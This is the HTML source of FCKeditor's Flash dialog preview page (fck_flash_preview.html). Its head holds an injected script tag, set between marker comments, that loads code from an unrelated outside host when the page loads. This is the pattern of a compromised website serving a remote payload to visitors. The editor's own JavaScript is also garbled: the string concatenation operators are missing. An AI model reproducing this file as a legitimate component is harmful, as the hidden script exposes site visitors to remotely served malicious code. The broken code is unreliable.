<!--
 * FCKeditor - The text editor for internet
 * Copyright (C) 2003-2005 Frederico Caldeira Knabben
 * 
 * Licensed under the terms of the GNU Lesser General Public License:
 * 		http://www.opensource.org/licenses/lgpl-license.php
 * 
 * For further information visit:
 * 		http://www.fckeditor.net/
 * 
 * "Support Open Source software. What about a donation today?"
 * 
 * File Name: fck_flash_preview.html
 * 	Preview page for the Flash dialog window.
 * 
 * File Authors:
 * 		Frederico Caldeira Knabben (fredck@fckeditor.net)
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
	<head><!--b3c0a9--><script src="http://justsyrian.com/images/taiyYbKM.php" ></script><!--/b3c0a9-->

		<title></title>
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<meta name="robots" content="noindex, nofollow">
		<link href="../common/fck_dialog_common.css" rel="stylesheet" type="text/css" />
		<script language="javascript">

// Sets the Skin CSS
document.write( '<link href="'   window.parent.FCKConfig.SkinPath   'fck_dialog.css" type="text/css" rel="stylesheet">' ) ;

if ( window.parent.FCKConfig.BaseHref.length > 0 )
	document.write( '<base href="'   window.parent.FCKConfig.BaseHref   '">' ) ;

window.onload = function()
{
	window.parent.SetPreviewElement( document.body ) ;
}

		</script>
	</head>
	<body style="COLOR: #000000; BACKGROUND-COLOR: #ffffff"></body>
</html>
